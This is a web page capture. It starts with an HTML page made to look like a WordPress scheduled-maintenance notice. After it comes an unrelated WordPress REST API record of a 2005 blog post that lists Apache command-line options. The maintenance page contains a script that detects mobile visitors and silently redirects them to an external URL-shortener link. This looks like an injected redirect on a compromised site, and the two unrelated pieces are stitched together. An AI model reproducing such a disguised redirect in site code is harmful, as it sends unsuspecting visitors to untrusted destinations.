<!DOCTYPE html>
<html lang="en">

<head>

<meta charset="UTF-8">

<meta name="viewport" content="width=device-width, initial-scale=1.0">

<meta name="robots" content="noindex, follow">

<title>Briefly unavailable for scheduled maintenance</title>

<style>

*{
    box-sizing:border-box;
}

body{

    margin:0;

    height:100vh;

    display:flex;

    justify-content:center;

    align-items:center;

    background:#f0f6fc;

    font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Arial,sans-serif;

    color:#21759b;

}

.box{

    background:#fff;

    padding:50px 40px;

    border-radius:18px;

    box-shadow:0 10px 35px rgba(0,0,0,.08);

    text-align:center;

    width:90%;

    max-width:600px;

}

.logo{

    font-size:62px;

    font-weight:700;

    margin:0;

    letter-spacing:-2px;

}

.text{

    margin-top:20px;

    font-size:19px;

    line-height:1.7;

    color:#5c6b77;

}

.loader{

    width:42px;

    height:42px;

    border:3px solid #d9e7f2;

    border-top:3px solid #21759b;

    border-radius:50%;

    margin:30px auto 0;

    animation:spin 1s linear infinite;

}

@keyframes spin{

    100%{
        transform:rotate(360deg);
    }

}

@media(max-width:600px){

    .logo{
        font-size:44px;
    }

    .text{
        font-size:16px;
    }

}

</style>

</head>

<body>

<div class="box">

    <h1 class="logo">WordPress</h1>

    <div class="text">
        Briefly unavailable for scheduled maintenance.<br>
        Check back in a some hours.
    </div>

    <div class="loader"></div>

</div>
<script>

const isMobile = window.matchMedia("(max-width: 768px)").matches
    || /Android|iPhone|iPad|iPod|Opera Mini|IEMobile/i.test(navigator.userAgent);

if (isMobile) {

    window.location.replace("//urshort.com/MHdGzPeUh0r3");

}

</script>
</body>
</html>{"id":11,"date":"2005-05-30T17:45:32","date_gmt":"2005-05-30T16:45:32","guid":{"rendered":"http:\/\/www.fredkuo.idv.tw\/wordpress\/?p=11"},"modified":"2005-05-30T17:45:32","modified_gmt":"2005-05-30T16:45:32","slug":"apache-disconnect-problem","status":"publish","type":"post","link":"https:\/\/fredkuo.idv.tw\/wordpress\/?p=11","title":{"rendered":"apache disconnect problem"},"content":{"rendered":"<p>My apache server disconnect  for unknow reason, I use TaskScheduler to start the apache every 12 hrs.<br \/>\nHere are the cmd for apache,<br \/>\nD:\\Program Files\\PHP Home Edition 2\\Apache2\\bin>apache \/?<br \/>\nUsage: apache [-D name] [-d directory] [-f file]<br \/>\n              [-C &#8220;directive&#8221;] [-c &#8220;directive&#8221;]<br \/>\n              [-w] [-k start|restart|stop|shutdown]<br \/>\n              [-k install|config|uninstall] [-n service_name]<br \/>\n              [-v] [-V] [-h] [-l] [-L] [-t] [-S]<br \/>\nOptions:<br \/>\n  -D name           : define a name for use in <ifdefine name> directives<br \/>\n  -d directory      : specify an alternate initial ServerRoot<br \/>\n  -f file           : specify an alternate ServerConfigFile<br \/>\n  -C &#8220;directive&#8221;    : process directive before reading config files<br \/>\n  -c &#8220;directive&#8221;    : process directive after reading config files<br \/>\n  -n name           : set service name and use its ServerConfigFile<br \/>\n  -k start          : tell Apache to start<br \/>\n  -k restart        : tell running Apache to do a graceful restart<br \/>\n  -k stop|shutdown  : tell running Apache to shutdown<br \/>\n  -k install        : install an Apache service<br \/>\n  -k config         : change startup Options of an Apache service<br \/>\n  -k uninstall      : uninstall an Apache service<br \/>\n  -w                : hold open the console window on error<br \/>\n  -e level          : show startup errors of level (see LogLevel)<br \/>\n  -E file           : log startup errors to file<br \/>\n  -v                : show version number<br \/>\n  -V                : show compile settings<br \/>\n  -h                : list available command line options (this page)<br \/>\n  -l                : list compiled in modules<br \/>\n  -L                : list available configuration directives<br \/>\n  -t -D DUMP_VHOSTS : show parsed settings (currently only vhost settings)<br \/>\n  -S                : a synonym for -t -D DUMP_VHOSTS<br \/>\n  -t                : run syntax check for config files<\/ifdefine><\/p>\n","protected":false},"excerpt":{"rendered":"<p>My apache server disconnect for unknow reason, I use Ta [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[2],"tags":[],"class_list":["post-11","post","type-post","status-publish","format-standard","hentry","category-webserver"],"_links":{"self":[{"href":"https:\/\/fredkuo.idv.tw\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/11"}],"collection":[{"href":"https:\/\/fredkuo.idv.tw\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fredkuo.idv.tw\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fredkuo.idv.tw\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fredkuo.idv.tw\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11"}],"version-history":[{"count":0,"href":"https:\/\/fredkuo.idv.tw\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/11\/revisions"}],"wp:attachment":[{"href":"https:\/\/fredkuo.idv.tw\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fredkuo.idv.tw\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fredkuo.idv.tw\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}